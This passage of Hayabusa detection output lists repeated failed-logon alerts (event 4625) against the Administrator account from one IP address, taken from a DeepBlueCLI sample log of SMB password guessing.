NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: 